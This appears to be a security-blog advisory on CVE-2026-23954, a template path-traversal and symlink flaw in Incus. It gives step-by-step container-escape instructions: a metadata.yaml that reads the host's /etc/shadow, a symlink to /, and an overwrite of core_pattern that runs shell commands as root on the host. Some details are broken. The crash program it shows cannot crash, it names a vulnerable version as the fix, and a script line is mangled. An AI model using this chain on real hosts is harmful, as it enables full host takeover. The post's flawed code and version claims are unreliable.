Listen to this Post
How CVE-2026-23954 Works
Incus is a system container and virtual machine manager. Versions 6.21.0 and below allow a user with the ability to launch a container with a custom image (e.g., a member of the `incus` group) to use directory traversal or symbolic links in the templating functionality to achieve host arbitrary file read and write, ultimately resulting in arbitrary command execution on the host.
When using an image with a `metadata.yaml` containing templates, both the source and target paths are not checked for symbolic links or directory traversal. For example, the following `metadata.yaml` snippet can read an arbitrary file from the host root filesystem as root and place it inside the container:
templates: /shadow: when: - start template: ../../../../../../../../etc/shadow
Additionally, the path of the target of the template is not checked or opened safely and can therefore contain symbolic links pointing outside the container root filesystem. For example:
templates: /realroot/proc/sys/kernel/core_pattern: when: - start template: core_pattern.tpl
Where the container root filesystem contains a symbolic link named `/realroot` pointing to /. This will cause the contents of the template to be written to the host root filesystem as root. This can be exploited to achieve arbitrary command execution on the host by overwriting key files such as /proc/sys/kernel/core_pattern, followed by causing a crash inside the container to execute arbitrary commands on the host.
The vulnerability exists in Incus’s container image templating system within the `driver_lxc.go` source file. When an instance starts, the code processes a `metadata.yaml` file that defines file templates. The `source` path for the template content and the `target` path for its final location are not adequately sanitized. An attacker can craft a `metadata.yaml` where the `template:` source field uses directory traversal sequences like ../../../../etc/shadow. This causes Incus to read arbitrary host files as root and copy their content into the container. Furthermore, if the container’s root filesystem contains a symbolic link (e.g., `/realroot` -> /), the target path for the template can leverage this symlink. A path like `/realroot/proc/sys/kernel/core_pattern` will resolve on the host, allowing an attacker to write a controlled template file to any host location. By overwriting critical files like core_pattern, a subsequent container crash triggers the execution of attacker-defined shell commands with root privileges on the host operating system.
DailyCVE Form
Platform: Incus
Version: <= 6.21.0
Vulnerability: Path Traversal/Symlink
Severity: Critical
Date: 2026-01-22
Prediction: Patch expected 2026-01-24
What Undercode Say
Analytics
The vulnerability is trivially exploitable for host-level Remote Code Execution (RCE). A proof of concept is available. The attack requires container launch permissions (incus group).
Check Incus version:
incus version
Manual Reproduction Steps:
- Obtain and unpack a legitimate root filesystem (e.g., alpine/edge) into a directory named
rootfs. - Inside the unpacked root filesystem, create a symbolic link named
realroot:ln -s / rootfs/realroot
- Create a directory named `templates` alongside the `rootfs` directory. Include a file `core_pattern.tpl` containing:
|/bin/sh -c "%E"
- Add files `segfault.c` and `stage2` to the root filesystem, setting `stage2` executable:
chmod +x rootfs/stage2
5. Create a `metadata.yaml` for this image:
templates: /shadow: when: - start template: ../../../../../../../../etc/shadow /realroot/proc/sys/kernel/core_pattern: when: - start template: core_pattern.tpl
6. Create the image archive and import into Incus:
tar cf poc.tar incus image import poc.tar --alias poc
7. Launch the newly imported image and obtain a shell:
incus launch poc poc --ephemeral incus shell poc
8. Observe that the file `/shadow` inside the container contains the contents of the `/etc/shadow` file from the host (host file read vulnerability).
segfault.c:
int main() {
int p = 0;
p = 42;
return 0;
}
stage2:
!/bin/sh id > /host_rootfs_poc_file
Exploit
1. Create malicious image with `metadata.yaml` and symlinks.
2. Import and launch the image.
3. Trigger crash to execute `core_pattern` command.
Protection
- Apply vendor patch (upgrade to Incus version 6.21.0 or 6.0.6).
- Restrict membership of the `incus` and `incus-admin` groups to trusted administrators only.
- Disable the ability for unprivileged users to import custom images.
- Validate template paths.
Impact
- Host file read/write.
- Root command execution.
- Complete host compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
